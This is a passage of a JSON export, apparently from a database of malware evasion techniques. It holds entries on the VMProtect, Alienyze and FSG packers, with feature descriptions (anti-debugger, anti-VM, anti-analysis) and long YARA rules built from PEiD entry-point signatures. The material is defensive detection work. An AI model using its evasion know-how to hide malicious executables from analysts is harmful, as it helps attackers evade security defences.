                    "rule": "rule VMProtect_v125_PolyTech_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B 45 00 83 C5 02 66 8B 00 66 89 45 00 E9 A5 06 00 00 8B 45 00 66 8B 55 04 83 C5 06 66 89 10 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect246_PolyTech: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? ?? 60 C7 ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 60 E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_v125_PolyTech: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 55 50 52 }\r\n        $b = { 8B 45 00 83 C5 02 66 8B 00 66 89 45 00 E9 A5 06 00 00 8B 45 00 66 8B 55 04 83 C5 06 66 89 10 E9 }\r\n        $c = { 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 06 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule VMProtect_07x_08_PolyTech_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 5B 20 56 4D 50 72 6F 74 65 63 74 20 76 20 30 2E 38 20 28 43 29 20 50 6F 6C 79 54 65 63 68 20 5D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_106107_PolyTech_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 68 00 00 00 00 8B 74 24 28 BF ?? ?? ?? ?? FC 89 F3 03 34 24 AC 00 D8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_V1X_PolyTech: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 68 00 00 00 00 8B 74 24 28 BF ?? ?? ?? ?? FC 89 F3 03 34 24 AC 00 D8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_0x_PolyTech: PEiD\r\n{\r\n    strings:\r\n        $a = { 5B 20 56 4D 50 72 6F 74 65 63 74 20 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_180_phpbb3: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 ?? ?? ?? ?? E8 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 
A8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_V1X_PolyTech_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 68 00 00 00 00 8B 74 24 28 BF ?? ?? ?? ?? FC 89 F3 03 34 24 AC 00 D8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_1704_phpbb3: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 ?? ?? ?? ?? E8 ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_0x_PolyTech_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 5B 20 56 4D 50 72 6F 74 65 63 74 20 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_106107_PolyTech: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 68 00 00 00 00 8B 74 24 28 BF ?? ?? ?? ?? FC 89 F3 03 34 24 AC 00 D8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_07x_08_PolyTech: PEiD\r\n{\r\n    strings:\r\n        $a = { 5B 20 56 4D 50 72 6F 74 65 63 74 20 76 20 30 2E 38 20 28 43 29 20 50 6F 6C 79 54 65 63 68 20 5D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _VMProtect_v125_PolyTech_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B 45 00 83 C5 02 66 8B 00 66 89 45 00 E9 A5 06 00 00 8B 45 00 66 8B 55 04 83 C5 06 66 89 10 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _VMProtect_v125_PolyTech: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B 45 00 83 C5 02 66 8B 00 66 89 45 00 E9 A5 06 00 00 8B 45 00 66 8B 55 04 83 C5 06 66 89 10 E9 }\r\n        $b = { 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 53 56 52 56 51 9C 55 57 68 00 00 00 00 8B 74 24 2C 89 E5 81 EC C0 00 00 00 89 E7 03 75 00 8A 06 46 0F B6 C0 FF 34 85 A7 72 45 00 C3 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}"
                }
            ]
        },
        {
            "id": 190,
            "unprotect_id": "U1409",
            "name": "Alienyze",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "Alienyze is a software packer designed to compress executable files, allowing developers to reduce the file size of their software as much as possible. It also offers the following protection and usability features:\r\n\r\n- Anti-debugger techniques that detect and fool attached debuggers\r\n\r\n- Anti-VM techniques that detect sandbox and virtualized environments\r\n\r\n- Protection from disassemblers and software analysis tools\r\n\r\n- Hardware ID locking to make applications machine dependent\r\n\r\n- Integrity checks that detect code patching and tampering\r\n\r\n- Customizable compression and encryption of the application's code\r\n\r\n- Real-time protection of the running application\r\n\r\n- Load and save support for project configuration settings\r\n\r\n- Multilingual user interface with language selection support",
            "resources": "https://alienyze.com/",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "id": 189,
            "unprotect_id": "U1408",
            "name": "FSG",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "FSG is a free, simple packer that compresses both small and large files. Although it is popular and commonly used to hide malware code, it is relatively simple to unpack: the stub's decompression loop writes the unpacked data to its final destination, from which it can be recovered.",
            "resources": "https://www.aldeid.com/wiki/Category:Digital-Forensics/Computer-Forensics/Anti-Reverse-Engineering/Packers/FSG",
            "tags": "",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 107,
                    "key": "yara_detect_fsg",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_detect_FSG",
                    "rule": "rule FSG_v110_Eng_dulekxt_Borland_Cpp_1999_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 2B C8 68 80 ?? ?? 00 EB 02 1E BB 5E EB 02 CD 20 68 B1 2B 6E 37 40 5B 0F B6 C9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_60_70_ASM: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 01 00 00 00 5A 5E E8 02 00 00 00 BA DD 5E 03 F2 EB 01 64 BB 80 ?? ?? 00 8B FA EB 01 A8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_120_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cpp: PEiD\r\n{\r\n    strings:\r\n        $a = { 0F B6 D0 E8 01 00 00 00 0C 5A B8 80 ?? ?? 00 EB 02 00 DE 8D 35 F4 00 00 00 F7 D2 EB 02 0E EA 8B 38 EB 01 A0 C1 F3 11 81 EF 84 88 F4 4C EB 02 CD 20 83 F7 22 87 D3 33 FE C1 C3 19 83 F7 26 E8 02 00 00 00 BC DE 5A 81 EF F7 EF 6F 18 EB 02 CD 20 83 EF 7F EB 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_FSG_10_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 BB D0 01 40 00 BF 00 10 40 00 BE 90 90 90 90 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v131: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 BB ?? ?? ?? ?? B2 80 A4 B6 80 FF D3 73 F9 33 C9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v133: PEiD\r\n{\r\n    strings:\r\n        $a = { BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v10_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 23 CA EB 02 5A 0D E8 02 00 00 00 6A 35 58 C1 C9 10 BE 80 ?? ?? 
00 0F B6 C9 EB 02 CD 20 BB F4 00 00 00 EB 02 04 FA EB 01 FA EB 01 5F EB 02 CD 20 8A 16 EB 02 11 31 80 E9 31 EB 02 30 11 C1 E9 11 80 EA 04 EB 02 F0 EA 33 CB 81 EA AB AB 19 08 04 D5 03 C2 80 EA 33 0F B6 C9 0F BE 0E 88 16 EB 01 5F EB 01 6B 46 EB 01 6D 0F BE C0 4B EB 02 CD 20 0F BE C9 2B C9 3B D9 75 B0 EB 01 99 C1 C1 05 91 9D B2 E3 22 E2 A1 E2 F2 22 E2 A0 ?? ?? ?? E2 35 CA EC E2 E2 E2 E4 B4 57 E7 6C F8 28 F4 B4 A5 94 62 15 BD 86 95 E4 E1 F6 06 55 DA 15 AB E1 F6 06 55 FA 15 A2 E1 F6 06 55 03 95 E4 23 92 F2 E1 F6 06 F4 A2 55 DB 57 21 8C CD BE CA 25 E2 E2 E2 0D AD 57 F2 CA 1A E2 E2 E2 CD 0A 8E B3 CA 56 23 F5 AB CD FE 73 2A A3 C2 EA 8E CA 04 E2 E2 E2 1F E2 5F E2 E2 55 EC 62 DE E7 55 E8 65 DA 61 59 E4 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_bartxt_WinRAR_SFX_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 02 EB 02 CD 20 B8 80 ?? 42 00 EB 01 55 BE F4 00 00 00 13 DF 13 D8 0F B6 38 D1 F3 F7 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cue_60: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 ?? CF ?? ?? 80 ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_131_Eng_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 A4 B6 80 FF D3 73 F9 33 C9 FF D3 73 16 33 C0 FF D3 73 23 B6 80 41 B0 10 FF D3 12 C0 73 FA 75 42 AA EB E0 E8 46 00 00 00 02 F6 83 D9 01 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 48 13 C9 EB }\r\n        $b = { C1 E0 06 EB 02 CD 20 EB 01 27 EB 01 24 BE 80 ?? 
42 00 49 EB 01 99 8D 1D F4 00 00 00 EB 01 5C F7 D8 1B CA EB 01 31 8A 16 80 E9 41 EB 01 C2 C1 E0 0A EB 01 A1 81 EA A8 8C 18 A1 34 46 E8 01 00 00 00 62 59 32 D3 C1 C9 02 EB 01 68 80 F2 1A 0F BE C9 F7 D1 2A D3 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_Borland_Cpp_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 2E EB 02 A5 55 BB 80 ?? ?? 00 87 FE 8D 05 AA CE E0 63 EB 01 75 BA 5E CE E0 63 EB 02 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v120_Eng_dulekxt_Microsoft_Visual_Cpp_60_70: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 EB 01 91 8D 35 80 ?? ?? 00 33 C2 68 83 93 7E 7D 0C A4 5B 23 C3 68 77 93 7E 7D EB 01 FA 5F E8 02 00 00 00 F7 FB 58 33 DF EB 01 3F E8 02 00 00 00 11 88 58 0F B6 16 EB 02 CD 20 EB 02 86 2F 2A D3 EB 02 CD 20 80 EA 2F EB 01 52 32 D3 80 E9 CD 80 EA }\r\n        $b = { EB 02 CD 20 EB 01 91 8D 35 80 ?? ?? 00 33 C2 68 83 93 7E 7D 0C A4 5B 23 C3 68 77 93 7E 7D EB 01 FA 5F E8 02 00 00 00 F7 FB 58 33 DF EB 01 3F E8 02 00 00 00 11 88 58 0F B6 16 EB 02 CD 20 EB 02 86 2F 2A D3 EB 02 CD 20 80 EA 2F EB 01 52 32 D3 80 E9 CD 80 EA 73 8B CF 81 C2 96 44 EB 04 EB 02 CD 20 88 16 E8 02 00 00 00 44 A2 59 46 E8 01 00 00 00 AD 59 4B 80 C1 13 83 FB 00 75 B2 F7 D9 96 8F 80 4D 0C 4C 91 50 1C 0C 50 8A ?? ?? ?? 50 E9 34 16 50 4C 4C 0E 7E 9B 49 C6 32 02 3E 7E 7B 5E 8C C5 6B 50 3F 0E 0F 38 C8 95 18 D1 65 11 2C B8 87 28 C3 4C 0B 3C AC D9 2D 15 4E 8F 1C 40 4F 28 98 3E 10 C1 45 DB 8F 06 3F EC 48 61 4C 50 50 81 DF C3 20 34 84 10 10 0C 1F 68 DC FF 24 8C 4D 29 F5 1D 2C BF 74 CF F0 24 C0 08 2E 0C 0C 10 51 0C 91 10 10 81 16 D0 54 4B D7 42 C3 54 CB C9 4E }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v130_Eng_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 
00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 }\r\n        $b = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB ?? ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 09 06 AD 75 DB 8B EC C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_60_70_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { F7 DB 80 EA BF B9 2F 40 67 BA EB 01 01 68 AF ?? A7 BA 80 EA 9D 58 C1 C2 09 2B C1 8B D7 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Cpp_1999_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 2B C8 68 80 ?? ?? 00 EB 02 1E BB 5E EB 02 CD 20 68 B1 2B 6E 37 40 5B 0F B6 C9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_bartxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 }\r\n        $b = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 
00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB 27 ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 07 74 EF FE 07 75 06 47 FF 37 AF EB 09 FE 07 0F 84 1A ?? ?? FF 57 55 FF 53 04 09 06 AD 75 DB 8B EC C3 1B ?? ?? 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PseudoSigner_02_FSG_10: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 BB D0 01 40 00 BF 00 10 40 00 BE 90 90 90 90 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_50_60_: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 D2 0F BE D2 EB 01 C7 EB 01 D8 8D 05 80 ?? ?? ?? EB 02 CD 20 EB 01 F8 BE F4 00 00 00 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_120_Eng_dulekxt_Microsoft_Visual_Cpp_60_70_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C2 2C FB 8D 3D 7E 45 B4 80 E8 02 00 00 00 8A 45 58 68 02 ?? 8C 7F EB 02 CD 20 5E 80 C9 16 03 F7 EB 02 40 B0 68 F4 00 00 00 80 F1 2C 5B C1 E9 05 0F B6 C9 8A 16 0F B6 C9 0F BF C7 2A D3 E8 02 00 00 00 99 4C 58 80 EA 53 C1 C9 16 2A D3 E8 02 00 00 00 9D CE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_02_FSG_10_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 
67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 BB D0 01 40 00 BF 00 10 40 00 BE 90 90 90 90 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_120_Eng_dulekxt_Borland_Cpp: PEiD\r\n{\r\n    strings:\r\n        $a = { 03 DE EB 01 F8 B8 80 ?? 42 00 EB 02 CD 20 68 17 A0 B3 AB EB 01 E8 59 0F B6 DB 68 0B A1 B3 AB EB 02 CD 20 5E 80 CB AA 2B F1 EB 02 CD 20 43 0F BE 38 13 D6 80 C3 47 2B FE EB 01 F4 03 FE EB 02 4F 4E 81 EF 93 53 7C 3C 80 C3 29 81 F7 8A 8F 67 8B 80 C3 C7 2B FE }\r\n        $b = { C1 F0 07 EB 02 CD 20 BE 80 ?? ?? 00 1B C6 8D 1D F4 00 00 00 0F B6 06 EB 02 CD 20 8A 16 0F B6 C3 E8 01 00 00 00 DC 59 80 EA 37 EB 02 CD 20 2A D3 EB 02 CD 20 80 EA 73 1B CF 32 D3 C1 C8 0E 80 EA 23 0F B6 C9 02 D3 EB 01 B5 02 D3 EB 02 DB 5B 81 C2 F6 56 7B F6 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v133a_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BE A8 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_60_: PEiD\r\n{\r\n    strings:\r\n        $a = { 91 EB 02 CD 20 BF 50 BC 04 6F 91 BE D0 ?? ?? 6F EB 02 CD 20 2B F7 EB 02 F0 46 8D 1D F4 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cpp: PEiD\r\n{\r\n    strings:\r\n        $a = { 1B DB E8 02 00 00 00 1A 0D 5B 68 80 ?? ?? 00 E8 01 00 00 00 EA 5A 58 EB 02 CD 20 68 F4 00 00 00 EB 02 CD 20 5E 0F B6 D0 80 CA 5C 8B 38 EB 01 35 EB 02 DC 97 81 EF F7 65 17 43 E8 02 00 00 00 97 CB 5B 81 C7 B2 8B A1 0C 8B D1 83 EF 17 EB 02 0C 65 83 EF 43 13 }\r\n        $b = { 1B DB E8 02 00 00 00 1A 0D 5B 68 80 ?? ?? 
00 E8 01 00 00 00 EA 5A 58 EB 02 CD 20 68 F4 00 00 00 EB 02 CD 20 5E 0F B6 D0 80 CA 5C 8B 38 EB 01 35 EB 02 DC 97 81 EF F7 65 17 43 E8 02 00 00 00 97 CB 5B 81 C7 B2 8B A1 0C 8B D1 83 EF 17 EB 02 0C 65 83 EF 43 13 D6 83 C7 32 F7 DA 03 FE EB 02 CD 20 87 FA 88 10 EB 02 CD 20 40 E8 02 00 00 00 F1 F8 5B 4E 2B D2 85 F6 75 AF EB 02 DE 09 EB 01 EF 34 4A 7C BC 7D 3D 7F 90 C1 82 41 ?? ?? ?? 87 DB 71 94 8B 8C 8D 90 61 05 96 1C A9 DA A7 68 5A 4A 19 CD 76 40 50 A0 9E B4 C5 15 9B D7 6E A5 BB CC 1C C2 DE 6C AC C2 D3 23 D2 65 B5 F5 65 C6 B6 CC DD CC 7B 2F B6 33 FE 6A AC 9E AB 07 C5 C6 C7 F3 94 3F DB B4 05 CE CF D0 BC FA 7F A5 BD 4A 18 EB A2 C5 F7 6D 25 9F BF E8 8D CA 05 E4 E5 E6 24 E8 66 EA EB 5F F7 6E EB F5 64 F8 76 EC 74 6D F9 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v133_Eng_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Basic_50_60_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { C1 CB 10 EB 01 0F B9 03 74 F6 EE 0F B6 D3 8D 05 83 ?? ?? EF 80 F3 F6 2B C1 EB 01 DE 68 77 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Basic_50_60: PEiD\r\n{\r\n    strings:\r\n        $a = { C1 CB 10 EB 01 0F B9 03 74 F6 EE 0F B6 D3 8D 05 83 ?? ?? EF 80 F3 F6 2B C1 EB 01 DE 68 77 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_01_FSG_10_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 
67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 BB D0 01 40 00 BF 00 10 40 00 BE 90 90 90 90 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Basic_50_60_: PEiD\r\n{\r\n    strings:\r\n        $a = { C1 CB 10 EB 01 0F B9 03 74 F6 EE 0F B6 D3 8D 05 83 ?? ?? EF 80 F3 F6 2B C1 EB 01 DE 68 77 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_120_Eng_dulekxt_Microsoft_Visual_Cpp_60_70: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 EB 01 91 8D 35 80 ?? ?? 00 33 C2 68 83 93 7E 7D 0C A4 5B 23 C3 68 77 93 7E 7D EB 01 FA 5F E8 02 00 00 00 F7 FB 58 33 DF EB 01 3F E8 02 00 00 00 11 88 58 0F B6 16 EB 02 CD 20 EB 02 86 2F 2A D3 EB 02 CD 20 80 EA 2F EB 01 52 32 D3 80 E9 CD 80 EA }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_120_Eng_dulekxt_Borland_Delphi_Borland_Cpp_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { C1 F0 07 EB 02 CD 20 BE 80 ?? ?? 00 1B C6 8D 1D F4 00 00 00 0F B6 06 EB 02 CD 20 8A 16 0F B6 C3 E8 01 00 00 00 DC 59 80 EA 37 EB 02 CD 20 2A D3 EB 02 CD 20 80 EA 73 1B CF 32 D3 C1 C8 0E 80 EA 23 0F B6 C9 02 D3 EB 01 B5 02 D3 EB 02 DB 5B 81 C2 F6 56 7B F6 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_40_50_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 46 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v11_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 ?? BF ?? 10 40 ?? 
BE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_60_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { F7 D9 80 E1 FE 75 02 49 49 97 A3 ?? ?? 03 C1 24 FE 75 02 48 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_13_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F B6 80 41 B0 10 FF 13 12 C0 73 FA 75 3C AA EB E0 FF 53 08 02 F6 83 D9 01 75 0E FF 53 04 EB 26 AC D1 E8 74 2F 13 C9 EB 1A 91 48 C1 E0 08 AC FF 53 04 3D 00 7D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_120_Eng_dulekxt_Microsoft_Visual_Cpp_60_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 EB 01 91 8D 35 80 ?? ?? 00 33 C2 68 83 93 7E 7D 0C A4 5B 23 C3 68 77 93 7E 7D EB 01 FA 5F E8 02 00 00 00 F7 FB 58 33 DF EB 01 3F E8 02 00 00 00 11 88 58 0F B6 16 EB 02 CD 20 EB 02 86 2F 2A D3 EB 02 CD 20 80 EA 2F EB 01 52 32 D3 80 E9 CD 80 EA }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_MASM32_TASM32_Microsoft_Visual_Basic: PEiD\r\n{\r\n    strings:\r\n        $a = { F7 D8 0F BE C2 BE 80 ?? ?? 00 0F BE C9 BF 08 3B 65 07 EB 02 D8 29 BB EC C5 9A F8 EB 01 94 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_MS_Visual_Cpp_Borland_Cpp_Watcom_Cpp: PEiD\r\n{\r\n    strings:\r\n        